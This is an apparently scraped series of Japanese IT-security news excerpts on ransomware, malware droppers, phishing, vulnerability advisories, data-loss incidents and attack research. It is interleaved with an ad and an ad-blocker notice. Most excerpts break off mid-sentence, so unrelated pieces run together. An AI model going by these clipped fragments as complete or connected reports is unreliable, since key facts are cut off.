Agenda Ransomwareは新しいランサムウェアです。 2022年の8月頃から観測されているものです。 8月当時のAgenda RansomwareはGoで実装されていました。 そんなAgenda Ransomwareの新種が観測されています。 開発はRust 以前はGoで開発されていたのですが、より新しいものはRustで開発されています。 Goもクロスプラットフォーム開発が可能で柔軟性に富んだものになっていますが、Rustも同じ面を持っています。 加えてRustではコンパイル時に利用できるオプションに特徴があり、リバースエンジニアリングに耐性があるという面も持っています。 従来のGo版のすべての機能の移行はまだ完了していないようですが、Rust版への移行が進んでいます。 ターゲットが変化 従来はタイやインドネシアなどの国の医療および教育部門を標的にしていました。 最近の活動では対
Raspberry Robinは以前から観測されているマルウェアです。 Raspberry RobinはUSBドライブを介して拡散するマルウェアで、いわゆるドロッパーです。 これまでもいろいろな他のマルウェアの配布に利用されてきていることが確認されています。 Bumblebee、IcedID、TrueBot、どれも聞き覚えがあるのではないでしょうか。 そんなRaspberry Robinに新しい動作が確認されています。 初期感染 これはRaspberry Robinとしては従来通りです。 USBメモリなどのデバイスを経由して感染を開始します。 難読化と階層化 これも従来から実装されています。 何段階にも階層化され、何層にもわたって難読化され、通常の方法での解析を難しくするように実装されています。 解析の検出 このマルウェアは動作の中で動作環境の検出を行います。 検出結果としてサンドボックス
ビューカードをかたるフィッシングの報告が増えています。 2022/12/21 13:00 時点では、フィッシングサイトは稼働中であり、JPCERT/CC にサイト閉鎖のための調査を依頼中です。類似のフィッシングサイトが公開される可能性がありますので、引き続きご注意ください。 このようなフィッシングサイトにて、アカウント情報 (VIEW's Net サービス ID、My JR-EAST ID、パスワード)、氏名 (漢字 (姓、名)、カナ / ローマ字 (姓、名))、カード番号、カード有効期限、セキュリティコード、生年月日、性別、自宅郵便番号等を絶対に入力しないよう、ご注意ください。 フィッシングサイトは本物のサイトの画面をコピーして作成することが多く、見分けることは非常に困難です。日頃からサービスへログインする際は、メールや SMS 内のリンクではなく、いつも利用しているスマートフォンの公式
JVN#43561812 スマートフォンアプリ「+メッセージ(プラスメッセージ)」における Unicode 制御文字の扱いに関する脆弱性 ソフトバンク株式会社 Android アプリ「+メッセージ(プラスメッセージ)」12.9.5 より前のバージョン iOS アプリ「+メッセージ(プラスメッセージ)」3.9.4 より前のバージョン 株式会社NTTドコモ Android アプリ「+メッセージ(プラスメッセージ)」54.49.0500 より前のバージョン iOS アプリ「+メッセージ(プラスメッセージ)」3.9.4 より前のバージョン KDDI株式会社 Android アプリ「+メッセージ(プラスメッセージ)」3.9.2 より前のバージョン iOS アプリ「+メッセージ(プラスメッセージ)」3.9.4 より前のバージョン
JPCERT/CCでは、イベントログの分析をサポートするツール「LogonTracer」の最新バージョン1.6をリリースしました。これまでのLogonTracerは、複数のインシデントを同時に調査する機能はありませんでしたが、今回のアップデートで複数のログを管理する機能を追加しました。さらに、Sigmaを使ってイベントログの中から不審なログの有無を調査する機能を追加しました。 今回は、このアップデートについて紹介します。その他のアップデート内容については下記のリリースをご覧ください。 https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.6.0 ログ管理機能 複数のインシデントを調査する場合、各インシデントで別々のログ管理を行ったり、複数インシデントを同時に調査したいことがあります。LogonTracerでは、ケースという単位でログ
メタバースでの⼠業サービスを扱うロボットコンサルティングが、メタバース空間においてのブロックチェーン技術を活用した特許を取得しました。 このAIニュースのポイント ロボットコンサルティングが、メタバース空間においてのブロックチェーン技術を活用した特許を取得 ユーザーは問題に対処可能な弁護士などの専門家の情報を容易に検索できる 法律事務所と連携してメタバース内での事例を集め、メタバース内での法的課題を解決していく方針 メタバースでの⼠業サービスを扱う株式会社ロボットコンサルティングが、メタバース空間においてのブロックチェーン技術を活用した特許を取得いたしました。 特許技術では、弁護士など専門家の要求または、専門家に成果物を依頼した依頼者の要求に応じて、成果物の電子データの保存場所を特定するための情報と専門家の情報をブロックチェーンに記録します。 そして第三者のユーザの要求に応じて、成果物の電
難しい特許出願を法律の専門家とAI技術でかんたんに! ㈱AI Samuraiは新サービス『みんなの特許』を開始します。 NEWS 株式会社AI Samurai (本社:東京都千代田区、代表取締役:白坂一)は特許出願を検討する法人様向けに、新サービス『みんなの特許』の販売を開始します。特許出願をAIがアシストすることで最短3日で出願前の特許調査や書類草案をご用意するとともに知的財産権訴訟費用保険(※1)を組み合わせたサービスです。 発明内容を特許出願前に送って頂くだけで、①出願予定の発明に関連する先行技術調査リスト、②出願予定の発明と先行技術文献との類似度をA~Dの4段階で評価する特許類似度評価、③類似特許を用いてAIが作成する特許出願書類草案の3点を提供します。また、本サービスを利用して特許出願を行えば、取得した特許権が含まれる利用者の製品・サービスに対して特許侵害訴訟を提起された場合、弁
株式会社AI Samurai は特許出願を検討する法人向けに、新サービス『みんなの特許』の販売を開始したことを発表した。特許出願をAIがアシストすることで最短3日で出願前の特許調査や書類草案を用意するとともに知的財産権訴訟費用保険を組み合わせたサービスだ。 発明内容を特許出願前に送るだけで、以下の3点が提供される。 出願予定の発明に関連する先行技術調査リスト出願予定の発明と先行技術文献との類似度をA~Dの4段階で評価する特許類似度評価類似特許を用いてAIが作成する特許出願書類草案また、本サービスを利用して特許出願を行うと、取得した特許権が含まれる利用者の製品・サービスに対して特許侵害訴訟を提起された場合、MS&ADインシュアランスグループの三井住友海上火災保険株式会社と連携し弁護士費用の訴訟などに関する費用の一部が補償されるという。 みんなの特許とは特許出願をするためには、類似技術が既に出
インターネットに接続して利用するおもちゃに飛びつく前に知っておくべきことがある。プライバシーや子供の安全を守るために気を付けるべき点や対策について解説する。 IoT(Internet of Things)は、私たちの生活や働き方を変えつつある。スマート・ペースメーカーからフィットネス・トラッカー、音声アシスタント、あるいはスマート・ドアベルに至るまで、これらの技術は私たちをより健康に、より安全に、より生産的に、そして楽しませてくれるものだ。 同様に、子供向けの先進的な玩具も製造されるようになった。全世界におけるスマート玩具市場は2桁成長が見込まれており、その市場規模は2027年までに240億ドル(3兆4,800億円相当)に達すると予測されている。ただし、インターネット接続とデータ、そしてコンピューターが関係するからには、プライバシーやセキュリティに関する懸念は避けられない。 子供の学習と創
「アイティメディアの高橋と申します。今、Twitter上で、御社から顧客情報が漏えいしているのではないかという書き込みが複数流れているのですが、どういうことでしょうか?」──もし広報の窓口にこんな問い合わせが来たら、皆さんの会社ではどう対応するだろうか。クラウド型会計・人事サービスを提供するfreeeではこんな風に、広報や営業・顧客対応も含めた包括的な障害対応訓練を実施した。 顧客・マスコミなど社外とのやりとりにもフォーカス freeeには2018年10月、会計処理の集中する月末に2時間半にわたってサービスが停止するという大障害を発生させてしまった苦い経験がある。その反省を踏まえ、記憶を風化させず、いざというときに適切な対処を迅速に取れるよう、全社にまたがる障害対応訓練を毎年10月に実施している。 21年の障害対応訓練は、今まさに猛威を振るうランサムウェアを題材にしたものだった。サプライチ
国立天文台は11月22日、電波望遠鏡「アルマ望遠鏡」について、チリにある観測所の計算機システムが10月にサイバー攻撃を受けた影響で、科学観測などが約1カ月停止している状態だと発表した。現地当局が原因などの調査を続けており、年内の観測再開を目指している。 サイバー攻撃を受けたのは10月29日。攻撃の発覚後、アンテナや科学データのアーカイブシステムなどを切り離したが、通信などに使う計算機が影響を受け、全ての観測を停止さぜる得なくなったという。チリにある観測所のWebサイトも影響を受け、停止している。 電子メールの利用は22日までに再開。新しい共同作業用ツールも導入したことから、職員は普段通りの業務を行えているという。観測所の危機管理チームは、欧州南天天文台と国立天文台、米国国立電波天文台のサイバーセキュリティ担当者と協議し、復旧計画を策定している。 アルマ望遠鏡はチリの標高5000mの高地に建
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 中国の浙江大学に所属する研究者らが発表した論文「PLA-LiDAR: Physical Laser Attacks against LiDAR-based 3D Object Detection in Autonomous Vehicle」は、レーザー光を自動運転車のLiDARに照射し、敵対的な点群を注入することで3次元物体検出を欺く攻撃を提案した研究報告だ。 例えば、横断報道を渡る歩行者がいるのに存在しないものと認識させたり、歩行者がいないのに存在しているものと認識させたりなどが行える。 自動運転車の多くに実装してあるLiDARは、照射し返ってきた反射光の時間を計算して周囲の3Dオブジェ
米Twitter社から漏えいしたTwitterアカウントデータ約540万件が、ハッカーフォーラムで公開されていると、米メディアBleeping Computerが報じている。公開されたのはアカウントのID、名前、ログイン名、電話番号、メールアドレスなど。1月に見つかったTwitterの脆弱性を突いた攻撃により盗まれたもので、8月には3万ドル(約405万円)で販売されていた。 Bleeping Computerは同じ脆弱性を悪用してさらに大規模な情報が漏えいしたとも報じた。8月に販売されたものとは異なる情報が大量に含まれるという。情報量は1700万件を超えるとみられるが、実際の量と攻撃者は不明としている。 同誌は、Twitterに関するフィッシングメールなどが出回る可能性もあるため、開かずに削除するなどの対策が必要と注意喚起している。 問題の脆弱性は、22年1月にTwitter社が実施したバ
第三者によるなりすましを防ぐため、パスワードの他に追加認証を求められることも少なくないが、余計な手間が増え、使いこなせない人もいる。新技術「バックグラウンド認証」はこうした煩わしさを解消でき、開発企業は広く普及を目指している。 インターネットによるサービスやスマートフォンのアプリを利用する際の本人認証を誰でも簡単にできる技術が登場した。第三者によるなりすましを防ぐため、本人が設定したパスワードだけでなく、二段階認証やワンタイムパスワードなど追加認証を求められることも少なくないが、本人にとっては余計な手間が増え、使いこなせない人もいる。新技術はこうした煩わしさを解消でき、開発したベンチャー企業は広く普及を目指している。 この技術を開発したのは、ソフト開発を手掛けるAnchorZ(東京都台東区)。顔や声といった生体情報に加え、スマホを使う際の画面までの距離や角度、使っている「Wi-Fi」や衛星
救急病院サイバー攻撃、Emotetぶり返し、尼崎事件のその後……11月の情報セキュリティまとめ 影響が大きくなる前に対策を(1/2 ページ) 2021年に徳島県の病院がランサム攻撃を受け、医療機関にもサイバー攻撃対策が必要なのではないかという問題意識が広がりつつある。そんな中、大阪の高度救急救命センターがサイバー攻撃を受けて外来診療を一時停止するに至ってしまい、11月初めごろに話題になった。 本記事では、11月に起きた情報セキュリティニュースを振り返る。 大阪の病院にサイバー攻撃 脆弱性放置が原因か 大阪市住吉区の大阪急性期・総合医療センターがランサム攻撃を受けた。電子カルテシステムに障害が発生し、11月1日には新規の外来診療を停止するに至った。 同病院は大阪府内に3カ所のみ設置されている「高度救命救急センター」の一つ。大やけどや指肢切断、急性薬物中毒などの特殊疾患に対応する医療機関だ。
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 中国科学技術大学と米カンザス大学に所属する研究者らが発表した論文「Blacktooth: Breaking through the Defense of Bluetooth in Silence」は、他人のBluetooth対応機器と接続し乗っ取るサイバー攻撃を提案した研究報告だ。 Bluetooth仕様の一連の脆弱性を利用し、Bluetooth周辺機器になりすまし、被害機器(スマートフォンやPCなど)との接続を確立し、プロファイルを変更することで権限を昇格する。これにより、被害機器に対して悪意のあるコマンドを入力したり、デバイスの機密情報を抜き取ったりなどが可能となる。また、接続の際に被
米Googleの脅威分析グループ(TAG:Threat Analysis Group)は11月30日(現地時間)、Chromeブラウザ、Firefox、Microsoft Defenderのゼロデイ脆弱性を標的とするエクスプロイトフレームワーク「Heliconia」について説明した。このスパイウェアはスペインのセキュリティ企業Variston ITと関係がある可能性があると指摘している。 Google、Mozilla、Microsoftは、影響を受ける脆弱性を2021年および2022年初頭に修正したという。これまでに積極的なエクスプロイトは検出されていないが、実際に悪用された可能性が高いとしている。 Varistonは公式サイトによるとカスタムセキュリティソリューション企業のようだが、Googleはターゲットの端末に密かにインストールするスパイウェアを提供しているとみている。 Helico
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 ドイツのUniversity of Duisburg-Essen、University of the Bundeswehr、KUKAに所属する研究者らが発表した論文「An Investigation of Shoulder Surfing Attacks on Touch-Based Unlock Events」は、スマートフォンを後方からのぞき見られている状況を調査した研究報告だ。 スマートフォンのロック解除などの認証イベントの際に魚眼レンズで後方を自動撮影し、どれくらいの割合で人から見られているかを調査した。またその際に、ユーザー本人に危機感があるのかを調査した。 スマートフォンで一般
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 米セントルイス・ワシントン大学、米テネシー大学に所属する研究者らが発表した論文「HeatDeCam: Detecting Hidden Spy Cameras via Thermal Emissions」は、熱画像で隠しカメラを見つけられるアプリを提案した研究報告だ。スマートフォンに赤外線カメラを取り付けるだけで、充電器や電気スタンドなどに仕込まれた隠しカメラを見つけることができるという。 隠しカメラはスパイカメラとも呼ばれ、一般的な物に隠したり、偽装して使用されるビデオカメラで、人に気付かれずに録画することを目的として設置される。2017年、韓国では6400件以上の不正な撮影の報告があり
国立天文台は12月2日、約1000人分の個人情報を保存したUSBメモリを紛失したとして謝罪した。情報の不正使用は確認されていないが、USBメモリはいまだ見つかっていないとしている。 職員が紛失に気付いたのは4月15日。17日に上長に報告した。紛失したUSBメモリを最後に確認したのは2021年11月26日ごろだったという。保存していたデータは、国立天文台の会議資料や採用にかかる応募書類など。個人情報は最大で1048件含まれていた。暗号化はしておらず、保管場所である引き出しは施錠していなかった。 今後は最高情報セキュリティ責任者(CISO)の指導により、職員に情報セキュリティポリシーの順守を促す他、職員教育や記録媒体の取り扱い手順書の整備、USBメモリの暗号化など対策を進めるとしている。 関連記事 USBメモリ紛失の尼崎市、無断で再委託のBIPROGYに損害賠償請求 「市のイメージダウンにつな
SNSなどで勧誘されたアルバイトで、PayPayのアカウント情報や残高をだまし取られるなどのトラブルが確認されているとし、PayPayが注意を呼び掛けている。 「アルバイトに必要だ」と指定のアプリをインストールさせて操作を指示し、商品を購入させたり、PayPayのアカウント情報をだまし取ろうとするケースや、「報酬受け取りのために必要」と嘘をつき、PayPay残高を送らせたり、ログインに必要な情報をだまし取ろうとするケースが報告されているという。 同社は、過去にやり取りのある相手でも、氏名・携帯番号・住所などを十分に確認し、少しでも怪しい場合は取り引きしないこと、ログインに必要なIDやパスワード、SMS認証コードなどを第三者に共有しないことなどを呼び掛けている。 関連記事 「メルカリのアカウントを売る在宅ワーク」に注意 犯罪に加担のおそれ SNSや副業サイトなどで、メルカリアカウントの売買や
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 近距離無線通信技術であるBluetooth Low Energy(BLE)は、多くのアプリケーションで使用されている。しかし、BLEデバイスは、近くにいる攻撃者がBluetoothパケットを盗み、特定のデバイスやユーザーと関連付けることができるため、MACアドレス(ネットワークにつながる機器に割り当てられている識別番号)追跡の対象になっている。 これはアイドル状態のBLEデバイスは、約20ミリ秒に一度、近くにある接続可能なデバイスに自分のMACアドレスを知らせる信号を送るためである。 この問題に対し、Bluetooth SIG(Bluetoothの規格開発を統括する組織)はMACアドレス追
米Appleは12月7日(現地時間)、新たなデータ保護機能を3種類発表した。盗聴防止機能「iMessage Contact Key Verification」、物理認証デバイスを利用できるようにする「Security Keys for Apple ID」、iCloudの暗号化機能「Advanced Data Protection for iCloud」を追加する。 iMessage Contact Key VerificationはiMessageにおける盗聴を検知する機能。通信中に意図した相手以外の何者かがいることを検知した場合にアラートする。 Security Keys for Apple IDはApple IDの2要素認証のうちの1つとして、物理認証デバイスを利用できるようにする機能。Apple製以外のデバイスも追加できる。 Advanced Data Protection for
讀賣テレビ放送(大阪市中央区、以下読売テレビ)は12月12日、同社番組スタッフが放送前の映像素材が入った記録媒体を紛失したと発表した。紛失したのは10日。記録媒体が入ったカバンごと電車内で紛失した。番組スタッフは電車内で居眠りをしており、その間に盗難に遭った可能性が高いとしている。 紛失した記録媒体は、番組スタッフが個人所有していたもので、ロックはかかっていなかった。記録媒体の中には、放送前を含む複数の番組のロケ取材やスタジオ収録した映像素材を収録していた。同社では番組映像素材を社外に持ち出す際、私物の記録媒体の使用を禁止していたが、このルールが守られていなかった。 記録媒体に含まれていたのは以下の映像素材 「大阪ほんわかテレビ」のロケ素材とスタジオ収録素材 「ベストヒット歌謡祭直前バズリ動画で徹底解剖SP」のスタジオ収録素材、MV素材 「カミオト-上方音祭-2022」のロケ素材 同社は「
尼崎市は12月13日、同市職員が個人情報入りの公用スマートフォンを紛失したと明らかにした。スマホには市民の電話番号2件やLINEの連絡先約50件、同市で開催したイベントの写真や動画などを保存していたという。13日時点でスマホはまだ見つかっていない。スマホにはセキュリティロックがかかっており、パスワードを入れなければ中身の閲覧や使用はできないとしている。 スマホを紛失したのは、総合政策局武庫地域振興センター武庫地域課に勤務する職員。同職員は8日に帰宅した際、スマホを所持していないことに気付いたが、職場に忘れたと判断したという。職員は上長に報告しないまま9日には休暇を取得。12日に出勤したが、スマホが見つからなかったため上司に報告し、紛失が発覚した。 市は12日中に、当該スマホの使用停止手続きとLINEアカウント削除を要請したという。紛失の原因については、経過の詳細を含め調査中としている。尼崎
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。 米ロチェスター工科大学とカナダのウォータールー大学に所属する研究者らが発表した論文「OneButtonPIN: A Single Button Authentication Method for Blind or Low Vision Users to Improve Accessibility and Prevent Eavesdropping」は、PIN(Personal Identification Numbers)コード(パスコード)において、数字を押さずに入力する視覚障害者向けの手法を提案した研究報告だ。 顔や指認証と違って、どんな環境や状態でも安定してロック解除できる認証メカニ
米Cloudflareは12月13日(日本時間)、中小企業向けセキュリティ支援プログラムを日本やドイツなど5カ国で始めた。条件を満たした組織に、WAF(Webアプリケーションファイアウォール)やDDoS攻撃対策といったセキュリティサービスを無料提供する。 社員数50人以下、年間の収益が1000万ドル未満の中小企業のうち、地方自治体や非営利団体、地域社会に不可欠なインフラを提供する組織が対象。条件を満たす企業に、WAFやDDoS攻撃対策サービス、フィッシング詐欺対策サービスに加え、クラウドへのアクセスを監視する「CASB」(Cloud Access Security Broker)といったゼロトラストセキュリティサービスを無料で提供する。利用期間は無制限という。 Cloudflareは想定する支援先として、病院や水処理施設、地域へのエネルギー供給に携わる事業者を挙げている。同社はプログラム実
熊本県立大学は12月13日、同学名誉教授のメールアカウントが不正ログインされ、個人情報が漏えいした可能性があると明らかにした。名誉教授は例外的に2要素認証を免除されていた上、他サイトでも使っている短いパスワードを設定していたという。 事実が判明したのは7日。名誉教授のメールアカウントに海外から8月30日以降で約1000件の不正ログインがあったと分かった。漏えいした可能性があるのは、教職員や学生などの氏名やメールアドレスなど3537人分、教職員などの履歴書43人分、名誉教授のアドレス帳991人分、その他の人事資料など。 熊本県立大学は原則として2要素認証を求めているが、名誉教授はスマートフォンを持っていなかったため例外的に免除していた。使っていたパスワードは短く、他サイトでも使っていたもので、これらが不正ログインの原因になったとみている。 問題判明後は、パスワードの変更やウイルススキャン、警
2022年も残り2週間。コロナ禍はまだ続いているが世は忘年会シーズンになり、金曜夜には職場の仲間と飲みに行く人もいるだろう。だが、そういうときこそ情報セキュリティには気を使わないといけない。飲み会でUSBメモリやPCをなくすなんてことがあれば、年末年始は対応でつぶれるかもしれない。 兵庫県尼崎市は、6月に起きた尼崎市の個人情報入りUSBメモリ紛失事案について、12月12日に調査報告書を公開した。本記事ではこの報告書から事件を振り返りながら、忘年会シーズンに注意すべき点を確認していく。 日頃からあふれていたコンプラ違反 まずは登場人物を整理しよう。尼崎市では臨時特別給付金を給付する上で、システム構築などをBIPROGYに委託していた。同社はシステム構築やデータ更新、メンテナンスなどの実務をアイフロント(東京都千代田区)とI社に再委託。さらに、アイフロントは業務をX社に再委託した。
年末年始が近づき、いまだコロナ禍ではあるものの帰省や旅行などの予定を立てている人も多いだろう。正月休みの間は、システム管理者が不在になるなど平時とは異なる状況になるため、いつも以上に情報セキュリティ対策には気を付けないといけない。 本記事では、情報処理推進機構(IPA)が公開している「年末年始における情報セキュリティに関する注意喚起」を見ながら、必要な対策についておさらいしていこう。 連絡体制は? ルール確認した? 電源切った? IPAは長期休暇に入る前にするべきこととして「連絡体制・連絡先の確認」「社内ネットワークへの接続ルールの確認」「機器持ち出しルールの確認」「使わない機器の電源OFF」などを挙げている。 管理者に向けては不測の事態に備えて、委託先も含めた連絡体制が適切か、連絡先が有効化を確認することを勧めている。その他、休暇中にメンテナンス作業などで社内ネットワークに接続する予定が
LINE社は12月15日、Android版LINEアプリで提供している「Keep機能」に脆弱性が見つかったとして謝罪した。特定の条件を満たすと、Android端末を譲渡した場合に、LINEアカウントをログアウトしても、別アカウントでログインすれば過去のデータを閲覧できる状態になっていた。 問題が発生していたのはKeep機能をリリースした2015年8月12日から22年10月25日まで。LINEアカウントの削除や別端末へのアカウント引継ぎを行った際に、アプリが強制終了するなどの理由でログアウト処理が中断し、その上でアプリを削除せずに譲渡するなどして第三者が別のアカウントで利用した場合に問題が発生する。影響を受けたとみられるユーザーには個別に報告した。 9月23日に社内で脆弱性が報告されて調査を開始。10月25日に不具合を修正したLINEアプリバージョン12.18.0をリリースした。ユーザーには
モバイルバッテリーとは呼べない。「ほぼポタ電」なコレ1台で有事の時もアウトドアも大活躍!【AmazonスマイルSALE】
米AI研究企業OpenAIの研究者らは12月19日(現地時間)、テキストプロンプトから3Dオブジェクトを生成するAIシステム「Point-E」をオープンソース化したと発表した。 同様のシステムとしては米Googleの「DreamFusion」などがあるが、発表論文によると、Point-Eは例えば単体のGPU(米NVIDIAの「V100」)でも3Dモデルを1~2分で生成できるという。 Point-Eは、点群(point cloud)で3Dオブジェクトを生成する。名称の「E」は点群を効率的(Efficiently)に生成することに由来するという。 3D生成は2段階で行われる。まずプロンプトを入力すると、レンダリングされた合成ビューが生成され、次に点群拡散スタックがこの画像を条件付けして3DのRGB点群を生成する。 「この方法は、最先端の他の類似技術よりも性能は劣る」が、DreamFusionの
1,000円前後の低い価格で髪を切る「格安カット店」が、路面店や大型商業施設内で増えている。美容業全体を見れば、カットだけで数千円かかるのは当たり前。なぜ、同業者の4分の1、5分の1といった価格でサービスが提供できるのか、そのもうけのカラクリを調べた。 草分けは「QB HOUSE」 カット専門店の草分けは、キュービーネットホールディングス(HD)が展開する「QB HOUSE」となる。同社の公式サイトによると、1996年に国内で初めての「ヘアカット専門店」として、第1号店を東京・神田美土代町にオープン。今も業界最大手の企業であり続けている。 説明文には「余計な手間や無駄を省き、世の中の人々に本当に必要とされる『時間のクオリティ』だけに集中した『お手軽で安心なヘアカットサービス』」というのがテーマで、現在では国内だけでなく、シンガポール、香港、台湾、ニューヨークにも展開しているそうだ。 この説
コンテンツブロックが有効であることを検知しました。 このサイトを利用するには、コンテンツブロック機能(広告ブロック機能を持つ拡張機能等)を無効にしてページを再読み込みしてください。 ✕
Intelは2021年9月発売の第12世代Coreプロセッサ「Alder Lake」で高性能コアと高効率コアを組み合わせたハイブリッドアーキテクチャを採用し、前世代以前と比べて「卓越したパフォーマンス」を実現しました。ここで比較対象とされた「前世代」こと第11世代Coreプロセッサ「Rocket Lake」がそこまでひどいものなのか、情報サイトのChips and Cheeseが調査を行っています。 Was Rocket Lake Power Efficient? – Chips and Cheese https://chipsandcheese.com/2022/12/17/was-rocket-lake-power-efficient/ Googleで「Rocket Lake」と検索したときのサジェストはこんな感じで「失敗」「ゴミ」「黒歴史」と厳しい単語が並びます。実際に検索結果を見に
Fortinetは、VPNなどセキュリティ機器の脆弱性を狙う攻撃を減らす方法をどう考えているのか:セキュリティ・アディッショナルタイム(49) セキュリティ人材不足、IT人材不足はたびたび指摘され、VPNなどセキュリティアプライアンスの脆弱性を狙った攻撃が近年頻発している。今の課題について「2022年クラウドセキュリティレポート」を基にFortinetに聞いた。 あらためて言うまでもなく、今、多くの企業がクラウドを活用しての企業変革、デジタルトランスフォーメーション(DX)に取り組んでいる。「企業はそれぞれ異なる目的を達成するために、それぞれ異なる形でパブリッククラウドやSaaSを活用し、ビジネスの在り方や運用を変革しようとしています」と、Fortinetでプロダクトマネジメント担当 シニアバイスプレジデントを務めるロバート・メイ氏は語った。 FortinetがCybersecurity
クラウドは「注文住宅」、ゼロトラストは「友達作り」、製品導入がゴール?――“設計思想”で強化するセキュリティ:ITmedia Security Week 2022 冬 2022年11月に開催された「ITmedia Security Week 2022 冬」の「クラウド&ゼロトラスト」ゾーンにおいて、日本コンピュータセキュリティインシデント対応チーム協議会 運営委員長の萩原健太氏が基調講演「クラウド活用とゼロトラストの考え方に流され過ぎていませんか?~製品導入ではなく設計思想や方針がセキュリティを強化する~」と題して講演した。「これはあくまで登壇者の私見も含めて」と前置きしつつ、さまざまなキーワードが飛び交うITセキュリティの世界において、もう一度主目的を思い出すきっかけとなる講演だった。その様子をレポートする。
冒頭、林氏は「われわれはデジタルアイデンティティーの時代に至っている」と述べる。ゼロトラストの世界においてデジタルアイデンティティーは重要であり、今まさに大きく変容しようとしている。その変容を捉えることも重要だ。 まずはアプローチとして、現状を把握することから林氏は始めた。西部開拓時代のイメージを掲出しつつ、「サイバー空間においては攻撃者優位性が高く、自己防衛が必要で治安維持力が低い、“未成熟な世界”にわれわれはいる」と話す。 2013年、Googleのエリック・サック氏は、「セキュリティの専門スタッフが100人以下のサービスに自分のパスワードを預けるなど、ばかげている」といったコメントを残したことを林氏は引用する。「100人のセキュリティ専門スタッフは中央省庁にもいない。2013年からは技術も変化しているので、必ずしもこの発言は正とは限らない。しかし、2013年から今に至るまで、われわれ
Googleは2022年12月13日(米国時間)、オープンソース開発者が自分のプロジェクトに関連する脆弱(ぜいじゃく)性情報に簡単にアクセスできる無料ツール「OSV-Scanner」を公開した。 Googleは2021年にオープンソースソフトウェア(OSS)の開発者と利用者のために、脆弱性のトリアージ(優先順位を付けて対処すること)を改善する取り組みとして、「Open Source Vulnerability」(OSV)スキーマを公開し、これに基づく分散型オープンソース脆弱性データベースサービス「OSV.dev」を立ち上げた。OSV-Scannerの公開は、この取り組みの次のステップだとしている。 OSVスキーマは、全てのオープンソースエコシステムと脆弱性データベースが、1つのシンプルで正確かつ機械可読なフォーマットで情報を公開し、利用できるようにする。OSVデータベースは、プロジェクトの
介護業界というとアナログな仕事が多く、人手不足から長時間労働が常態化しているといったイメージを持つ人も多いだろう。これは見方を変えると、デジタル化による効果が出やすい業界とも言える。 だが、デジタル化の先のデジタルトランスフォーメーション(DX)をイメージできる企業はそう多くはない。ここに斬り込むのがヤマシタだ。同社は今、在宅介護テック業界のプラットフォーマーを目指して大胆なDXを推進している。 ヤマシタは1963年創業の老舗企業で、福祉用具レンタル・販売事業やリネンサプライ事業を展開している。全国に75を超える拠点を持ち、2400人超の従業員を抱える業界大手企業の一つだ。山下和洋社長は、先代の急逝で2013年に現職に就いた。「最初は経営環境のあまりのアナログさに面食らいました」と、山下氏は当時を振り返る。 山下氏は10年をかけて経営改革を進めてきた。社内の意識改革に取り組み、ITを活用し
2022年11月に開催された「ITmedia Security Week 2022 冬」の「サプライチェーン攻撃だけじゃない、新たな脅威」ゾーンにおいて、日本ハッカー協会 代表理事の杉浦隆幸氏が「サプライチェーン攻撃の実態」をテーマに講演した。これまでもITセキュリティにおけるさまざまな実績に加え、自動車やIoT、果てはドローンをハッキングするなど多岐にわたって活動する“ハッカー”の視点から、今、各所で話題に上がる「サプライチェーン攻撃」に対する解像度を上げるためのヒントを語った。 本稿では、「サプライチェーン攻撃」という言葉が示すものの本質、そしてその対策をレポートする。 そもそも、サプライチェーン攻撃とは? 杉浦氏はまず、「サプライチェーン攻撃」の指すものを定義する。サプライチェーン攻撃とは「サプライチェーンの脆弱(ぜいじゃく)な部分を標的にして、組織に損害を与えようとするサイバー攻撃
NIST(National Institute of Standards and Technology:米国立標準技術研究所)は2022年12月15日(米国時間)、ハッシュ関数「SHA-1」の使用を2030年12月31日までに完全に停止すると発表した。 SHA-1は、原文から160bitのハッシュ値を生成し、通信経路の両端で比較することで、通信途中で原文が改ざんされていないかどうかを検出できる。SSL/TLS、PGP、SSH、S/MIME、IPsec、デジタル署名(コード署名)など、さまざまなアプリケーションやプロトコルで、暗号化やデータの完全性の検証に利用されてきた。 関連記事 Windowsで証明書にSHA-1が使われているかどうか確認する(GUI編) 2017年第1四半期には、古いハッシュアルゴリズム「SHA-1」を使った証明書のサポートが終了するという。そんな証明書をWindows
最近、報道でも見掛けることが増えた「サプライチェーン攻撃」は、IPA(情報処理推進機構)が毎年発表しているサイバーセキュリティの10大脅威にも、「サプライチェーンの弱点を悪用した攻撃」として、ここ数年ランクインを続けており、2022年も順位を上げている。企業にとって大きな問題としての意識が高まっていることは間違いない。 「サプライチェーン攻撃」とは何か。企業はどんな対策を講じるべきなのか。サプライチェーン攻撃など、サイバーセキュリティに関するコンサルティングサービスを提供しているニュートン・コンサルティングで、執行役員兼CISO(最高情報セキュリティ責任者)、プリンシパルコンサルタントを務める内海良氏に話を聞いた。 現在の日本で「サプライチェーン攻撃」のひと言で扱われるサイバー攻撃は、示す範囲が幅広く定義が定まっていない。ニュートン・コンサルティングでは、4つのパターンに分類している。 最
近年、DX(Digital Transformation)の推進に伴い、部分最適化に陥って情報が連携されていないシステムを統合する動きが進んでいます。その中で、各種システムを統合・連携し、業務システムを全体最適化できるITSM(IT Service Management)ツールが注目されています。 最近のITSMツールでは、インシデント管理・変更管理などのサービスオペレーションに限らず、様々な外部アプリケーションが連携可能です。中でも、昨今、特権ID管理ツールとの連携が急速に進んでいます。弊社でも、多くのお客様から「特権IDの利用業務をITSMツール上で完結させたい」と要望を受けることが増えました。 では、特権ID管理ツールがITSMツールと連携することで、どんなメリットが生まれるのでしょうか。本ブログでは、連携が進む背景を概観した上で、連携イメージと効果について、ユースケースを交えながら
